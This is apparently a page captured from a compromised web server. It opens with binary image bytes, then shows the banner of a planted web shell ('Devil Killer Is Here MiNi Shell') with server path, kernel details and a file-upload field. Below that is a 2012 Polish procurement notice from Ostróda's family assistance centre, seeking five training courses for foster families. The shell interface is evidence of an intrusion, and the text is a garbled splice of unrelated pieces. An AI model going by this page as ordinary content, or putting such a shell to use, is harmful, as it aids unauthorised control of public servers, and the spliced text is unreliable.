JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120913/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120913/345620-N-2012.html

<p class="kh_header"><b>Ostróda: Przedmiotem zamówienia jest organizacja i przeprowadzenie na rzecz Zamawiającego 5 szkoleń w zakresie zagadnień specjalistycznych dla istniejących zawodowych i niezawodowych rodzin zastępczych, zamieszkujących na terenie powiatu ostródzkiego, a w przypadku niewykorzystanych miejsc szkoleniowych - spokrewnionych rodzin zastępczych z terenu powiatu ostródzkiego, w okresie do 31 grudnia 2012 r. (kod CPV- 80570000-0 Usługi szkolenia w dziedzinie rozwoju osobistego).</b><br>
<b>Numer ogłoszenia: 345620 - 2012; data zamieszczenia: 13.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Pomocy Rodzinie w Ostródzie , ul. Jana III Sobieskiego 5, 14-100 Ostróda, woj. warmińsko-mazurskie, tel. 89 6460406, faks 89 6460405.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.warmia.mazury.pl/powiat_ostrodzki/ oraz www. pcpr.ostroda.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest organizacja i przeprowadzenie na rzecz Zamawiającego 5 szkoleń w zakresie zagadnień specjalistycznych dla istniejących zawodowych i niezawodowych rodzin zastępczych, zamieszkujących na terenie powiatu ostródzkiego, a w przypadku niewykorzystanych miejsc szkoleniowych - spokrewnionych rodzin zastępczych z terenu powiatu ostródzkiego, w okresie do 31 grudnia 2012 r. (kod CPV- 80570000-0 Usługi szkolenia w dziedzinie rozwoju osobistego)..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest organizacja i przeprowadzenie na rzecz Zamawiającego 5 szkoleń w zakresie zagadnień specjalistycznych dla istniejących zawodowych i niezawodowych rodzin zastępczych, zamieszkujących na terenie powiatu ostródzkiego, a w przypadku niewykorzystanych miejsc szkoleniowych - spokrewnionych rodzin zastępczych z terenu powiatu ostródzkiego, w okresie do 31 grudnia 2012 r. (kod CPV- 80570000-0 Usługi szkolenia w dziedzinie rozwoju osobistego). 
Działanie zostanie zrealizowane na terenie miasta Ostróda, przeprowadzone w języku polskim przez osoby posiadające doświadczenie w pracy z rodzinami zastępczymi.
Działanie realizowane będzie w ramach Resortowego Programu Wspierania Rodziny i Systemu Pieczy Zastępczej na rok 2012 Szkolenia rodzin zastępczych, osób prowadzących rodzinne domy dziecka oraz dyrektorów placówek opiekuńczo-wychowawczych typu rodzinnego, współfinansowanego ze środków Ministerstwa Pracy i Polityki Społecznej.

Postępowanie prowadzone jest w pięciu częściach, każda z części stanowi osobny przedmiot zamówienia.

Część pierwsza przedmiotu zamówienia: Przeprowadzenie szkolenia w zakresie zagadnień specjalistycznych, tj.: 
Prawne aspekty funkcjonowania rodzin zastępczych, z uwzględnieniem w tematyce szkolenia następujących elementów: 
1.    Władza rodzicielska.
2.    Opieka prawna.
3.    Prawa rodziców zastępczych.
4.    Kontakty dziecka z rodziną biologiczną.
5.    Poszukiwanie i udzielanie wsparcia.
6.    Zarządzanie majątkiem dziecka.
7.    System wsparcia rodzin wychowujących dziecko niepełnosprawne.

W ramach usługi Wykonawca musi: 
1.  W okresie od dnia podpisania umowy do 31 grudnia 2012 r. przeprowadzić szkolenie dotyczące zagadnień specjalistycznych dla grupy ok 10-15 osób z rodzin zastępczych.
2.    Czas trwania szkolenia wynosi 24 godziny dydaktyczne.
3.    1 godzina dydaktyczna = 45 min. W czas trwania szkolenia nie wlicza się przerw.
4.    Zakres merytoryczny specjalistycznego szkolenia powinien być dostosowany do potrzeb uczestników. 
5.    Minimalny zakres merytoryczny szkolenia obejmuje zagadnienia takie jak:
-    Władza rodzicielska.
-    Opieka prawna.
-    Prawa rodziców zastępczych.
-    Kontakty dziecka z rodziną biologiczną.
-    Poszukiwanie i udzielanie wsparcia.
-    Zarządzanie majątkiem dziecka.
-    System wsparcia rodzin wychowujących dziecko niepełnosprawne.
6.    Wykonawca jest zobowiązany do przygotowania konspektu specjalistycznego szkolenia obejmującego powyższy zakres merytoryczny.
7.    Wykonawca jest zobowiązany do przygotowania materiałów szkoleniowych/ćwiczeniowych obejmujących powyższy zakres merytoryczny.
8.    Wykonawca jest zobowiązany do przeprowadzenia specjalistycznego szkolenia zgodnie 
z harmonogramem ustalonym z koordynatorem. 
9.    Miejsce realizacji usługi zostanie wskazane Wykonawcy najpóźniej w dniu zawarcia umowy.
10.  Wykonawca jest zobowiązany do przebywania na miejscu realizacji szkolenia przez cały czas jego trwania.
11. Wykonawca jest zobowiązany do zapewnienia frekwencji na poziomie minimum 80% podczas specjalistycznego szkolenia.
12.    Zajęcia muszą odbywać się z formie warsztatowej z wykorzystaniem ćwiczeń udostępnionych Zamawiającemu.
13.  Wykonawca jest zobowiązany do udokumentowania specjalistycznego szkolenia w postaci: konspektu zajęć, list obecności, dziennika zajęć, dokumentacji fotograficznej, ankiety ewaluacyjnej na rozpoczęcie i zakończenie zajęć.
14.  Wykonawca jest zobowiązany do przekazania Zamawiającemu oryginałów dokumentów wymienionych w punkcie 13 najpóźniej w dniu przedłożenia rachunku za wykonanie usługi.
15.    Wykonawca jest zobowiązany współpracować stale z innymi trenerami zatrudnionymi w projekcie oraz Zamawiającym.
16.    Wykonawca jest zobowiązany informować Zamawiającego o zaistniałych problemach.

Część druga przedmiotu zamówienia: Przeprowadzenie szkolenia w zakresie zagadnień specjalistycznych, tj.: 
Przeciwdziałanie wypaleniu zawodowemu rodzin zastępczych z uwzględnieniem w tematyce szkolenia następujących elementów: 
1.    Symptomy wypalenia zawodowego opiekunów zastępczych.
2.    Przyczyny i zagrożenia wypalenia zawodowego.
3.  Konflikty między dziećmi naturalnymi a przyjętymi, adaptacja do nowych warunków. Mediowanie konfliktów (wewnętrznych i międzyosobowych).
4.    Oczekiwania a rzeczywistość rodziców zastępczych, przełamywanie wstydu przed zwróceniem się o pomoc.
5.    Jak radzić sobie z krytyką i ocenianiem? Techniki zadawania pytań.
6.    Style i strategie radzenia sobie ze stresem.
7.    Metody przeciwdziałania wypaleniu zawodowemu.

W ramach usługi Wykonawca musi: 
1.    W okresie od dnia podpisania umowy do 31 grudnia 2012 r. przeprowadzić szkolenie dotyczące zagadnień specjalistycznych dla grupy ok 10-15 osób z rodzin zastępczych.
2.    Czas trwania szkolenia wynosi 24 godziny dydaktyczne.
3.    1 godzina dydaktyczna = 45 min. W czas trwania szkolenia nie wlicza się przerw.
4.    Zakres merytoryczny specjalistycznego szkolenia powinien być dostosowany do potrzeb uczestników.
5.    Minimalny zakres merytoryczny szkolenia obejmuje takie zagadnienia jak:
-    Symptomy wypalenia zawodowego opiekunów zastępczych.
-    Przyczyny i zagrożenia wypalenia zawodowego.
-    Konflikty między dziećmi naturalnymi a przyjętymi, adaptacja do nowych warunków. Mediowanie konfliktów (wewnętrznych i  międzyosobowych).
-    Oczekiwania a rzeczywistość rodziców zastępczych, przełamywanie wstydu przed zwróceniem się o pomoc.
-    Jak radzić sobie z krytyką i ocenianiem? Techniki zadawania pytań.
-    Style i strategie radzenia sobie ze stresem.
-    Metody przeciwdziałania wypaleniu zawodowemu.
6.  Wykonawca jest zobowiązany do przygotowania konspektu specjalistycznego szkolenia obejmującego powyższy zakres merytoryczny.
7.  Wykonawca jest zobowiązany do przygotowania materiałów szkoleniowych/ćwiczeniowych obejmujących powyższy zakres merytoryczny.
8.  Wykonawca jest zobowiązany do przeprowadzenia specjalistycznego szkolenia zgodnie z harmonogramem ustalonym z koordynatorem.
9.    Miejsce realizacji usługi zostanie wskazane Wykonawcy najpóźniej w dniu zawarcia umowy.
10.  Wykonawca jest zobowiązany do przebywania na miejscu realizacji szkolenia przez cały czas jego trwania.
11. Wykonawca jest zobowiązany do zapewnienia frekwencji na poziomie minimum 80% podczas specjalistycznego szkolenia.
12.    Zajęcia muszą odbywać się z formie warsztatowej z wykorzystaniem ćwiczeń udostępnionych Zamawiającemu.
13.  Wykonawca jest zobowiązany do udokumentowania specjalistycznego szkolenia w postaci: konspektu zajęć, list obecności, dziennika zajęć, dokumentacji fotograficznej, ankiety ewaluacyjnej na rozpoczęcie i zakończenie zajęć.
14.   Wykonawca jest zobowiązany do przekazania Zamawiającemu oryginałów dokumentów wymienionych w punkcie 13 najpóźniej w dniu przedłożenia rachunku za wykonanie usługi.
15.    Wykonawca jest zobowiązany współpracować stale z innymi trenerami zatrudnionymi w projekcie oraz Zamawiającym.
16.    Wykonawca jest zobowiązany informować Zamawiającego o zaistniałych problemach.

Część trzecia przedmiotu zamówienia: Przeprowadzenie szkolenia w zakresie zagadnień specjalistycznych, tj.: 
Komunikacja wg Marshalla Rosenberga z uwzględnieniem w tematyce szkolenia następujących elementów: 
1.    Rola komunikacji w utrzymywaniu więzi.
2.    Trudne emocje w komunikacji - jak sobie z nimi radzić.
3.    Komunikacja werbalna i niewerbalna.
4.    Jak mówić, żeby dzieci nas słuchały, jak słuchać, żeby dzieci do nas mówiły?
5.    Konflikty - jak nimi zarządzać. 
6.    Umiejętność rozpoznawania i nazywania swoich uczuć. Świadomość potrzeb i wyrażanie próśb. 
7.    Aktywne słuchanie.
W ramach usługi Wykonawca musi: 
1.  W okresie od dnia podpisania umowy do 31 grudnia 2012 r. przeprowadzić szkolenie dotyczące zagadnień specjalistycznych dla grupy ok 10-15 osób z rodzin zastępczych.
2.    Czas trwania szkolenia wynosi 24 godziny dydaktyczne.
3.    1 godzina dydaktyczna = 45 min. W czas trwania szkolenia nie wlicza się przerw.
4.    Zakres merytoryczny specjalistycznego szkolenia powinien być dostosowany do potrzeb uczestników.
5.    Minimalny zakres merytoryczny szkolenia obejmuje takie zagadnienia jak:
-    Symptomy wypalenia zawodowego opiekunów zastępczych.
-    Przyczyny i zagrożenia wypalenia zawodowego.
-    Konflikty między dziećmi naturalnymi a przyjętymi, adaptacja do nowych warunków. Mediowanie konfliktów (wewnętrznych i  międzyosobowych).
-    Oczekiwania a rzeczywistość rodziców zastępczych, przełamywanie wstydu przed zwróceniem się o pomoc.
-    Jak radzić sobie z krytyką i ocenianiem? Techniki zadawania pytań.
-    Style i strategie radzenia sobie ze stresem.
-    Metody przeciwdziałania wypaleniu zawodowemu.
6.  Wykonawca jest zobowiązany do przygotowania konspektu specjalistycznego szkolenia obejmującego powyższy zakres merytoryczny.
7.  Wykonawca jest zobowiązany do przygotowania materiałów szkoleniowych/ćwiczeniowych obejmujących powyższy zakres merytoryczny.
8.   Wykonawca jest zobowiązany do przeprowadzenia specjalistycznego szkolenia zgodnie 
z harmonogramem ustalonym z koordynatorem.
9.   Miejsce realizacji usługi zostanie wskazane Wykonawcy najpóźniej w dniu zawarcia umowy.
10.  Wykonawca jest zobowiązany do przebywania na miejscu realizacji szkolenia przez cały czas jego trwania.
11. Wykonawca jest zobowiązany do zapewnienia frekwencji na poziomie minimum 80% podczas specjalistycznego szkolenia.
12.   Zajęcia muszą odbywać się z formie warsztatowej z wykorzystaniem ćwiczeń udostępnionych Zamawiającemu.
13. Wykonawca jest zobowiązany do udokumentowania specjalistycznego szkolenia w postaci: konspektu zajęć, list obecności, dziennika zajęć, dokumentacji fotograficznej, ankiety ewaluacyjnej na rozpoczęcie i zakończenie zajęć.
14.  Wykonawca jest zobowiązany do przekazania Zamawiającemu oryginałów dokumentów wymienionych w punkcie 13 najpóźniej w dniu przedłożenia rachunku za wykonanie usługi.
15.    Wykonawca jest zobowiązany współpracować stale z innymi trenerami zatrudnionymi w projekcie oraz Zamawiającym.
16.    Wykonawca jest zobowiązany informować Zamawiającego o zaistniałych problemach.

Część czwarta przedmiotu zamówienia: Przeprowadzenie szkolenia w zakresie zagadnień specjalistycznych, tj.: 
Dzieci z trudnymi i niepożądanymi zachowaniami z uwzględnieniem w tematyce szkolenia następujących elementów: 
1.    Zaburzenia zachowań dzieci i młodzieży: 
-    odżywiania, 
-    zachowania, 
-    emocjonalne. 
2.    Depresja w wieku dziecięcym i młodzieżowym.
3.    Przemoc i agresja - fizyczna, psychiczna: w rodzinie, rówieśnicza.
4.    Uzależnienia, przejawy, rodzaje, profilaktyka.
5.    Zachowania seksualne dzieci i młodzieży.
6.    Techniki i metody postepowania z dzieckiem przejawiającym zachowania trudne.
7.    Alkoholizm rodziców biologicznych oraz jego skutki dla dzieci umieszczonych 
w rodzinnej opiece zastępczej (współuzależnienie, specyfiki pełnienia przez dzieci ról 
w rodzinach alkoholowych, charakterystyka choroby alkoholowej).
W ramach usługi Wykonawca musi: 
1.    W okresie od dnia podpisania umowy do 31 grudnia 2012 r. przeprowadzić szkolenie dotyczące zagadnień specjalistycznych dla grupy ok 10-15 osób z rodzin zastępczych.
2.    Czas trwania szkolenia wynosi 24 godziny dydaktyczne.
3.    1 godzina dydaktyczna = 45 min. W czas trwania szkolenia nie wlicza się przerw.
4.    Zakres merytoryczny specjalistycznego szkolenia powinien być dostosowany do potrzeb uczestników.
5.    Minimalny zakres merytoryczny szkolenia obejmuje takie zagadnienia jak:
-    Zaburzenia zachowań dzieci i młodzieży: 
   odżywiania, 
  zachowania, 
  emocjonalne. 
-    Depresja w wieku dziecięcym i młodzieżowym.
-    Przemoc i agresja - fizyczna, psychiczna: w rodzinie, rówieśnicza.
-    Uzależnienia, przejawy, rodzaje, profilaktyka.
-    Zachowania seksualne dzieci i młodzieży.
-    Techniki i metody postepowania z dzieckiem przejawiającym zachowania trudne.
-  Alkoholizm rodziców biologicznych oraz jego skutki dla dzieci umieszczonych w rodzinnej opiece zastępczej (współuzależnienie, specyfiki pełnienia przez dzieci ról w rodzinach alkoholowych, charakterystyka choroby alkoholowej). 
6.   Wykonawca jest zobowiązany do przygotowania konspektu specjalistycznego szkolenia obejmującego powyższy zakres merytoryczny.
7.   Wykonawca jest zobowiązany do przygotowania materiałów szkoleniowych/ćwiczeniowych obejmujących powyższy zakres merytoryczny.
8.   Wykonawca jest zobowiązany do przeprowadzenia specjalistycznego szkolenia zgodnie z harmonogramem ustalonym z koordynatorem.
9.   Miejsce realizacji usługi zostanie wskazane Wykonawcy najpóźniej w dniu zawarcia umowy.
10.  Wykonawca jest zobowiązany do przebywania na miejscu realizacji szkolenia przez cały czas jego trwania.
11. Wykonawca jest zobowiązany do zapewnienia frekwencji na poziomie minimum 80% podczas specjalistycznego szkolenia.
12.  Zajęcia muszą odbywać się z formie warsztatowej z wykorzystaniem ćwiczeń udostępnionych Zamawiającemu.
13. Wykonawca jest zobowiązany do udokumentowania specjalistycznego szkolenia w postaci: konspektu zajęć, list obecności, dziennika zajęć, dokumentacji fotograficznej, ankiety ewaluacyjnej na rozpoczęcie i zakończenie zajęć.
14.  Wykonawca jest zobowiązany do przekazania Zamawiającemu oryginałów dokumentów wymienionych w punkcie 13 najpóźniej w dniu przedłożenia rachunku za wykonanie usługi.
15.   Wykonawca jest zobowiązany współpracować stale z innymi trenerami zatrudnionymi w projekcie oraz Zamawiającym.
16.   Wykonawca jest zobowiązany informować Zamawiającego o zaistniałych problemach.

Część piata przedmiotu zamówienia: Przeprowadzenie szkolenia w zakresie zagadnień specjalistycznych, tj.: 
Zaburzenia rozwojowe dzieci i młodzieży z uwzględnieniem w tematyce szkolenia następujących elementów:
1.    Płodowy zespół alkoholowy FAS i płodowy efekt alkoholowy FAE.
-    sytuacja rodziny wychowującej dziecko z FAS/FAE;
-    fakty dotyczące FAS/FAE;
-    zaburzenia kliniczne i inne powodowane spożyciem alkoholu, wygaszanie patologicznych odruchów;
-    możliwości dzieci i młodzieży z FAS/FAE.
2.     ADHD.
-    etiologia zjawiska;
-    charakterystyka zachowania się dzieci z ADHD;
-    technika pracy z dzieckiem z zespołem ADHD;
-    przejawy agresji, zachowania agresywne.
W ramach usługi Wykonawca musi: 
1.  W okresie od dnia podpisania umowy do 31 grudnia 2012 r. przeprowadzić szkolenie dotyczące zagadnień specjalistycznych dla grupy ok 10-15 osób z rodzin zastępczych.
2.    Czas trwania szkolenia wynosi 24 godziny dydaktyczne.
3.    1 godzina dydaktyczna = 45 min. W czas trwania szkolenia nie wlicza się przerw.
4.    Zakres merytoryczny specjalistycznego szkolenia powinien być dostosowany do potrzeb uczestników.
5.    Minimalny zakres merytoryczny szkolenia obejmuje takie zagadnienia jak:
    Płodowy zespół alkoholowy FAS i płodowy efekt alkoholowy FAE.
-    sytuacja rodziny wychowującej dziecko z FAS/FAE;
-    fakty dotyczące FAS/FAE;
-    zaburzenia kliniczne i inne powodowane spożyciem alkoholu, wygaszanie patologicznych odruchów;
-    możliwości dzieci i młodzieży z FAS/FAE.
    ADHD.
-    etiologia zjawiska;
-    charakterystyka zachowania się dzieci z ADHD;
-    technika pracy z dzieckiem z zespołem ADHD;
-    przejawy agresji, zachowania agresywne.
6.  Wykonawca jest zobowiązany do przygotowania konspektu specjalistycznego szkolenia obejmującego powyższy zakres merytoryczny.
7.  Wykonawca jest zobowiązany do przygotowania materiałów szkoleniowych/ćwiczeniowych obejmujących powyższy zakres merytoryczny.
8.  Wykonawca jest zobowiązany do przeprowadzenia specjalistycznego szkolenia zgodnie z harmonogramem ustalonym z koordynatorem.
9.    Miejsce realizacji usługi zostanie wskazane Wykonawcy najpóźniej w dniu zawarcia umowy.
10.   Wykonawca jest zobowiązany do przebywania na miejscu realizacji szkolenia przez cały czas jego trwania.
11. Wykonawca jest zobowiązany do zapewnienia frekwencji na poziomie minimum 80% podczas specjalistycznego szkolenia.
12.   Zajęcia muszą odbywać się z formie warsztatowej z wykorzystaniem ćwiczeń udostępnionych Zamawiającemu.
13. Wykonawca jest zobowiązany do udokumentowania specjalistycznego szkolenia w postaci: konspektu zajęć, list obecności, dziennika zajęć, dokumentacji fotograficznej, ankiety ewaluacyjnej na rozpoczęcie i zakończenie zajęć.
14.  Wykonawca jest zobowiązany do przekazania Zamawiającemu oryginałów dokumentów wymienionych w punkcie 13 najpóźniej w dniu przedłożenia rachunku za wykonanie usługi.
15.    Wykonawca jest zobowiązany współpracować stale z innymi trenerami zatrudnionymi w projekcie oraz Zamawiającym.
16.    Wykonawca jest zobowiązany informować Zamawiającego o zaistniałych problemach.

Zamawiający zabezpiecza pomieszczenia do przeprowadzenia szkoleń.
Realizowane szkolenia nie mogą odbywać się w jednym terminie i nachodzić na siebie czasowo.

Odbiór wykonanych usług przeprowadzony zostanie na podstawie dokumentacji złożonej przez Wykonawców w formie oryginałów: list obecności, dzienników zajęć, konspektów zajęć, końcowego sprawozdania z wykonanej usługi oraz protokołu końcowego z wykonania usługi.

Zamówienie prowadzone jest w częściach. Każde specjalistyczne szkolenie stanowi osobną część zamówienia. Zamawiający nie ogranicza ilości części, o które może ubiegać się Wykonawca.

Nie dopuszcza się składania ofert wariantowych. Zamówienie nie jest prowadzone w celu zawarcia umowy ramowej, ustanowienia dynamicznego systemu zakupów i nie jest prowadzone w ramach aukcji elektronicznej.

Zamawiający nie dopuszcza podwykonawstwa..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek uznaje się za spełniony, jeżeli Wykonawca przeprowadził co najmniej jedno szkolenie o tematyce tożsamej z częścią przedmiotu zamówienia, o który się ubiega, w wymiarze nie mniejszym niż 10 godzin dydaktycznych oraz posiadają doświadczenie w pracy z rodzinami zastępczymi.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponują odpowiednim potencjałem technicznym do wykonania zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek uznaje się za spełniony, jeżeli Wykonawca dysponuje, co najmniej jednym trenerem posiadającym kwalifikacje zawodowe niezbędne do przeprowadzenia zajęć o tematyce opisanej w części przedmiotu zamówienia, o który się ubiega.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Doświadczenie - 30</li>
</ul>
